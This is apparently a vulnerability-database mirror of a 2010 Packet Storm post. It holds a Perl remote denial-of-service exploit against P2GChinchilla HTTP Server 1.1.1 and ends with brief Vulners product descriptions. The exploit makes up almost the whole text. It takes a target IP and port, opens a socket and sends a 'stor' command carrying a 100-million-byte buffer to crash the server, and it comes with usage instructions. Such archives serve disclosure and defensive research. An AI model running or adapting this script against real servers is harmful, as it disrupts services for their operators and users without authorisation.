Lucene search
K

P2GChinchilla HTTP Server Denial Of Service

🗓️ 26 Jan 2010 00:00:00Reported by Zer0 ThunderType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

P2GChinchilla HTTP Server Denial Of Servic

Code
`#!/usr/bin/perl  
# File Name :P2GChinchilla[TM] HTTP Server  
# Vuln : Remote Denial Of Service Exploit  
# Auther : Zer0 Thunder  
# Msn : [email protected]  
#  
#   
##==------>>  
#  
# Exploit Title: P2GChinchilla[TM] HTTP Server 1.1.1 Remote Denial Of Service Exploit  
# Date: 22/01/2010  
# Author: Zer0 Thunder  
# Site : http://www.proggies2go.org/pages/p2gChinchilla.html?ref=PAD  
# Software Link: http://www.proggies2go.org/pages/p2gChinchilla/p2gChinchilla.rar  
# Version: v 1.1.1  
# Tested on: Server runs on Windows XP Sp2 /Test on Remote Location  
##==------>>   
use IO::Socket::INET;  
$ip = $ARGV[0];  
$port = $ARGV[1];  
if (! defined $ARGV[0])  
{  
print "\t+================================================================+\n";  
print "\t+ --- P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service ---+\n";  
print "\t+ --- Author :Zer0 Thunder ---+\n";  
print "\t+ --- DATE: :[24/01/2010] ---+\n";  
print "\t+ --- ------------------------------------------------ ---+\n";  
print "\t+ --- Usage :perl exploit.pl [Host/Remote IP] [Port] ---+\n";  
print "\t+ --- ---+\n";  
print "\t+================================================================+\n";  
print "\n";   
print " Ex : exploit.pl localhost 50000\n"; # P2GChinchilla Default Port is 50000  
  
  
exit;  
}  
  
print "\t+================================================================+\n";  
print "\t+ --- P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service ---+\n";  
print "\t+ --- Author :Zer0 Thunder ---+\n";  
print "\t+ --- DATE: :[24/01/2010] ---+\n";  
print "\t+ --- ------------------------------------------------ ---+\n";  
print "\t+ --- Usage :perl exploit.pl [Host/Remote IP] [Port] ---+\n";  
print "\t+ --- ---+\n";  
print "\t+================================================================+\n";  
print "\n";   
print " Wait Till The Buffer is Done\n";   
my $b1 = "\x41" x 100000000;  
print "\n";  
print " DoS is UP !.. N Give it a Second \n";  
  
$DoS=IO::Socket::INET->new("$ip:$port") or die;  
  
print $DoS "stor $b1\n";  
print $DoS "QUIT\n";  
  
close $DoS;  
  
# exit :  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation